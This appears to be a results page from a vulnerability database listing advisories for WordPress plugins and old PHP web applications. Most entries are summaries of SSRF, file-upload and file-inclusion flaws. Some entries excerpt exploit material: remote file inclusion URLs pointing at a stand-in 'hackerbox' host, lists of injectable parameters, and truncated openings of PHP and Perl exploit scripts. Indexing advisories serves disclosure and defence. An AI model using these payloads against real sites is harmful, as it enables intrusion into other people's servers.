29 matches found
CVE-2026-0746
CVE-2026-0746 : The WordPress AI Engine plugin (
CVE-2026-0746 AI Engine <= 3.3.2 - Authenticated (Subscriber+) Server-Side Request Forgery
The AI Engine plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.3.2 via the 'getaudio' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations...
CVE-2026-0746
The AI Engine plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.3.2 via the 'getaudio' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations...
EUVD-2025-204668
The Redirection for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'movefiletoupload' function in all versions up to, and including, 3.2.7. This makes it possible for unauthenticated attackers to copy arbitrary files on the...
PT-2025-52586
Name of the Vulnerable Software and Affected Versions: Contact Form 7 Redirection plugin for WordPress versions up to and including 3.2.7. Description: The plugin is susceptible to arbitrary file uploads because of a lack of file type validation within the move file to upload function. This allows...
CVE-2025-12496 Zephyr Project Manager <= 3.3.203 - Authenticated (Custom+) Arbitrary File Read And Server-Side Request Forgery
The Zephyr Project Manager plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3.203 via the file parameter. This makes it possible for authenticated attackers, with Custom-level access and above, to read the contents of arbitrary files on the server,...
CVE-2025-12352
The CVE-2025-12352 issue affects the WordPress Gravity Forms plugin, specifically versions up to and including 2.9.20. The vulnerability arises from missing file type validation in the copy_post_image() function, allowing unauthenticated attackers to upload arbitrary files to the affected site’s ...
CVE-2025-12352 Gravity Forms <= 2.9.20 - Unauthenticated Arbitrary File Upload via 'copy_post_image'
The Gravity Forms plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the copy_post_image function in all versions up to, and including, 2.9.20. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's serv...
EUVD-2002-1418
Malware in sbrugna...
phpWebLog <= 0.5.3 Arbitrary File Inclusion
No description provided by source. Example: if register_globals=on and allow_url_fopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...
webERP <= 4.08.1 - Local/Remote File Inclusion Vulnerability
No description provided by source. Discovered by dun \ posdubatgmail.com 2012-06-27 webERP <= 4.08.1 Local/Remote File Inclusion Vulnerability Script: Accounting & Best...
Finding vulnerabilities in web applications
In this article I have collected what I consider to be interesting bugs in PHP scripts. But first, a description of some PHP interpreter settings: Quote: register_globals = ON - all variables are registered as globals; magic_quotes_gpc = ON - in the POST, GET and COOKIE arrays, quotes and dangerous...
School Data Navigator (page) Local/Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications. School Data Navigator page Local/Remote File Inclusion Vulnerability...
Podcast Generator 1.2 - 'GLOBALS[]' Multiple Vulnerabilities
++ | Podcast Generator RFI | | | magicquotesgpc=off -- LFI | +-------------------------+-----------------------------------------------------------+ | delete.php?GLOBALSamilogged=true&file&GLOBALSabsoluteurl= | | admin.php?p=admin&GLOBALSabsoluteurl= | |...
Coppermine Photo Gallery 1.4.19 File Upload
Written By Michael Brooks. Special thanks to str0ke! Coppermine Photo gallery - Remote PHP File Upload Affects: v1.4.19 Homepage: http://coppermine-gallery.net/ 5,239,057 downloads from sf.net! For this attack we need register_globals=on. The problem is that the anti-register_globals security can b...
sendcard_340_xpl.txt
!/usr/bin/php -q -d shortopentag=on php injection\n"; echo " works against magicquotesgpc=Off\n"; echo " 2 - arbitrary remote inclusion\n"; echo " works against allowurlfopen=On\n"; echo " 3 - arbitrary local inclusion\n"; echo " works regardless of php.ini settings\n"; echo " and if you succeed ...
DotClear <= 1.2.4 (prepend.php) Arbitrary Remote Inclusion Exploit
Exploit for unknown platform in category web applications. DotClear <= 1.2.4 prepend.php Arbitrary Remote Inclusion Exploit. !/usr/bin/php -q -d shortopentag=on ? ech...
Activity MOD Plus 1.1.0 - 'phpBB Mod' File Inclusion
phpBB 2.x Activity MOD Plus File Inclusion Vulnerability. Contacts ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com This exploit works on phpBB 2.x Activity MOD Plus. Original advisory can be found at: http://www.nukedx.com/?viewdoc=38 Successful exploitation needs register_globals on GET ...
Nucleus CMS 3.22 - 'DIR_LIBS' Remote File Inclusion
!/usr/bin/php -q -d shortopentag=on \r\n"; die...
sphider_13_xpl_pl.txt
!/usr/bin/perl use IO::Socket; print "\r\nSphider works with registerglobals = On & allowurlfopen = On\r\n"; print "by rgod rgodautisticiorg\r\n"; print "site: http://retrogod.altervista.org\r\n"; print "\r\ndork: "powered by sphider"\r\n"; sub main::urlEncode my $string = @; $string = s/\W/"%"...